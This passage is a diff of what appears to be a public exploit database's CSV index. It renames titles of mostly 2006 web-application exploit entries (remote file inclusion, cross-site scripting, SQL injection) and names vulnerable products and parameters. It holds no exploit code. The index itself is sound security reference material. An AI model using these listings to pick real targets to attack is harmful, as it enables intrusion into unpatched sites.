Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - 'admin/index.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - 'Facts.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - 'search.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -30696,16 +30697,16 @@ id,file,description,date,author,platform,type,port 28689,platforms/php/webapps/28689.txt,"PHP_news 2.0 - 'admin/catagory.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28690,platforms/php/webapps/28690.txt,"PHP_news 2.0 - 'creat_news_all.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28691,platforms/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Inclusion",2006-09-25,You_You,php,webapps,0 -28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS - 'index.php' Multiple Parameter Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 -28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS - modules/pageedit/index.php pageid Parameter Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 -28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x - '/admin/nav.php' Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - '/admin/image.php image' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - '/admin/header.inc.php' Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - '/footer.inc.php la_pow_by' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28729,platforms/php/webapps/28729.txt,"phpBB XS 0.58 - Multiple Remote File Inclusion",2006-09-30,xoron,php,webapps,0 -28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 - details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 -28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 -28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 +28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,Root3r_H3ll,php,webapps,0 +28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS - 'modules/pageedit/index.php?pageid' Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 +28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x - '/admin/nav.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,"HACKERS PAL",php,webapps,0 +28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - '/admin/image.php?image' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - '/admin/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,"HACKERS PAL",php,webapps,0 +28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - 'footer.inc.php?la_pow_by' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28729,platforms/php/webapps/28729.txt,"phpBB XS 0.58 - Multiple Remote File Inclusions",2006-09-30,xoron,php,webapps,0 +28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 - 'details.php?page' SQL Injection",2006-09-29,Hessam-x,php,webapps,0 +28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusions",2006-09-28,D_7J,php,webapps,0 +28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - 'search.php?query' SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28732,platforms/php/webapps/28732.txt,"Yblog - 'funk.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 28733,platforms/php/webapps/28733.txt,"Yblog - 'tem.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 28734,platforms/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 @@ -30731,20 +30732,20 @@ id,file,description,date,author,platform,type,port 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0 28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - Calendar.asp Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0 -28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - 'admin/banner_manager.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - 'admin/banner_statistics.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - 'admin/countries.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - 'admin/currencies.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - 'admin/languages.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - 'admin/manufacturers.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - 'admin/products_expected.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - 'admin/reviews.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - 'admin/specials.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - 'admin/stats_products_purchased.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - 'admin/stats_products_viewed.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - 'admin/tax_classes.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - 'admin/tax_rates.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - 'admin/zones.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - 'admin/banner_manager.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - 'admin/banner_statistics.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - 'admin/countries.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - 'admin/currencies.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - 'admin/languages.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - 'admin/manufacturers.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - 'admin/products_expected.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - 'admin/reviews.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - 'admin/specials.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - 'admin/stats_products_purchased.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - 'admin/stats_products_viewed.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - 'admin/tax_classes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - 'admin/tax_rates.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - 'admin/zones.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica - 'Display.asp' SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps,0 @@ -30752,9 +30753,9 @@ id,file,description,date,author,platform,type,port 28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps,0 28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 -28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - 'ISEARCH_PATH' Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0 +28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - 'ISEARCH_PATH' Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0 28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 -28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 +28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Multiple Remote File Inclusions",2006-10-09,Crackers_Child,php,webapps,0 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 28778,platforms/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal Information Disclosure",2006-10-16,"Derek Callaway",php,webapps,0 @@ -30793,22 +30794,22 @@ id,file,description,date,author,platform,type,port 28824,platforms/php/webapps/28824.txt,"phpList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 - 'index.php' Cross-Site Scripting",2006-10-17,CorryL,php,webapps,0 28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - Rpc.php Unauthorized Access",2006-10-18,jonepet,php,webapps,0 -28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusion",2006-10-18,Matdhule,php,webapps,0 +28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusions",2006-10-18,Matdhule,php,webapps,0 28828,platforms/php/webapps/28828.txt,"Zorum 3.5 - 'DBProperty.php' Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps,0 28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System - index.asp SQL Injection",2006-10-18,fireboy,asp,webapps,0 28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 - 'index.php' Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps,0 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0 -28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusion",2006-10-19,SuBzErO,php,webapps,0 +28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusions",2006-10-19,SuBzErO,php,webapps,0 28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - config.php SQL Injection",2006-10-20,G1UK,php,webapps,0 28838,platforms/php/webapps/28838.txt,"ClanLite - 'conf-php.php' Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0 -28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - smumdadotcom_ascyb_alumni/mod.php katalog Module query Parameter Cross-Site Scripting",2006-10-23,MP,php,webapps,0 -28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 -28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - Cat Parameter Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 -28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Parameter Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 +28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - 'smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,php,webapps,0 +28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 +28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 +28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - editzonetemplate template Parameter Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28845,platforms/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - Waka.php Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 -28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusion",2006-10-24,Crackers_Child,php,webapps,0 +28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusions",2006-10-24,Crackers_Child,php,webapps,0 28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0 28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - Pop_Mail.asp SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps,0 28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 @@ -30816,23 +30817,23 @@ id,file,description,date,author,platform,type,port 28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 -28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 +28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - 'consult/miniseul.php?cheminmini' Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0 28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 - Change_Pass.php Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0 28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 - dir.php Directory Traversal",2006-10-27,Christopher,php,webapps,0 28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0 28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - search.asp SQL Injection",2006-10-28,almaster,asp,webapps,0 28870,platforms/php/webapps/28870.txt,"PunBB 1.x - SQL Injection",2006-10-30,nmsh_sa,php,webapps,0 -28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 - db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 - db/PollDB.php CONFIG_DATAREADERWRITER Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 - fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 - fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 - 'db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 - 'db/PollDB.php?CONFIG_DATAREADERWRITER' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 - 'fetchsettings.php?toroot' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 - 'fstyles.php?toroot' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28875,platforms/php/webapps/28875.txt,"Freenews 1.1 - 'Aff_News.php' Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 -28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php Username' Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 +28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php?Username' SQL Injection",2006-10-30,poplix,asp,webapps,0 28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0 28881,platforms/php/webapps/28881.txt,"Foresite CMS - Index_2.php Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0 28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 - Htmlarea.php Cross-Site Scripting",2005-10-30,Vigilon,php,webapps,0 -28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusion",2006-10-31,MEFISTO,php,webapps,0 +28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusions",2006-10-31,MEFISTO,php,webapps,0 28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module - search.php SQL Injection",2006-10-31,Paisterist,php,webapps,0 28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28889,platforms/php/webapps/28889.txt,"Netquery 4.0 - NQUser.php Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps,0 @@ -30843,14 +30844,14 @@ id,file,description,date,author,platform,type,port 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x - Avatar Arbitrary File Upload",2006-11-02,securfrog,php,webapps,0 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 - 'index.php' SQL Injection",2006-11-02,Spiked,php,webapps,0 28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion",2006-11-07,navairum,php,webapps,0 -28900,platforms/php/webapps/28900.txt,"ac4p Mobile - 'index.php' Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 -28901,platforms/php/webapps/28901.txt,"ac4p Mobile - 'MobileNews.php' Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 -28902,platforms/php/webapps/28902.txt,"ac4p Mobile - 'polls.php' Multiple Parameter Cross-Site Scripting (1)",2006-11-03,AL-garnei,php,webapps,0 -28903,platforms/php/webapps/28903.txt,"ac4p Mobile - send.php cats Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 -28904,platforms/php/webapps/28904.txt,"ac4p Mobile - up.php Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 -28905,platforms/php/webapps/28905.txt,"ac4p Mobile - cp/index.php pagenav Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 +28900,platforms/php/webapps/28900.txt,"ac4p Mobile - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,php,webapps,0 +28901,platforms/php/webapps/28901.txt,"ac4p Mobile - 'MobileNews.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,php,webapps,0 +28902,platforms/php/webapps/28902.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (1)",2006-11-03,AL-garnei,php,webapps,0 +28903,platforms/php/webapps/28903.txt,"ac4p Mobile - 'send.php?cats' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 +28904,platforms/php/webapps/28904.txt,"ac4p Mobile - 'up.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,php,webapps,0 +28905,platforms/php/webapps/28905.txt,"ac4p Mobile - 'cp/index.php?pagenav' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0 -28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 +28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - 'archive.php?PID' Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 - popup.php SQL Injection",2006-11-04,x23,php,webapps,0 @@ -30861,7 +30862,7 @@ id,file,description,date,author,platform,type,port 28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 28920,platforms/php/webapps/28920.txt,"AIOCP 1.3.x - 'cp_users_online.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 28921,platforms/php/webapps/28921.txt,"AIOCP 1.3.x - 'cp_links_search.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28922,platforms/php/webapps/28922.txt,"AIOCP 1.3.x - 'load_page' Parameter Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps,0 +28922,platforms/php/webapps/28922.txt,"AIOCP 1.3.x - 'load_page' Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps,0 28923,platforms/php/webapps/28923.txt,"AIOCP 1.3.x - 'cp_dpage.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 28924,platforms/php/webapps/28924.txt,"AIOCP 1.3.x - 'cp_news.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 28925,platforms/php/webapps/28925.txt,"AIOCP 1.3.x - 'cp_forum_view.php' SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 @@ -30884,25 +30885,25 @@ id,file,description,date,author,platform,type,port 28942,platforms/php/webapps/28942.txt,"FreeWebShop 2.1/2.2 - 'index.php' page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 28943,platforms/php/webapps/28943.txt,"FreeWebShop 2.1/2.2 - 'index.php' cat Parameter Cross-Site Scripting",2006-11-08,"laurent gaffie",php,webapps,0 28944,platforms/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 -28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusion",2006-11-08,ajann,php,webapps,0 +28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusions",2006-11-08,ajann,php,webapps,0 28946,platforms/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 28947,platforms/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",php,webapps,0 28949,platforms/php/webapps/28949.txt,"bitweaver 1.x - 'newsletters/edition.php' tk Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 -28950,platforms/php/webapps/28950.txt,"LandShop 0.6.3 - ls.php Multiple Parameter Cross-Site Scripting",2006-11-09,"laurent gaffie",php,webapps,0 -28951,platforms/php/webapps/28951.txt,"LandShop 0.6.3 - ls.php Multiple Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 +28950,platforms/php/webapps/28950.txt,"LandShop 0.6.3 - 'ls.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-09,"laurent gaffie",php,webapps,0 +28951,platforms/php/webapps/28951.txt,"LandShop 0.6.3 - 'ls.php' Multiple SQL Injections",2006-11-09,"laurent gaffie",php,webapps,0 28952,platforms/php/webapps/28952.txt,"Omnistar Article Manager - Multiple SQL Injections",2006-11-09,"Benjamin Moss",php,webapps,0 -28953,platforms/php/webapps/28953.txt,"Bitweaver 1.x - blogs/list_blogs.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28954,platforms/php/webapps/28954.txt,"Bitweaver 1.x - fisheye/list_galleries.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28953,platforms/php/webapps/28953.txt,"Bitweaver 1.x - 'blogs/list_blogs.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28954,platforms/php/webapps/28954.txt,"Bitweaver 1.x - 'fisheye/list_galleries.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 28959,platforms/php/webapps/28959.txt,"WordPress Plugin Cart66 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 -29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0 -28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - 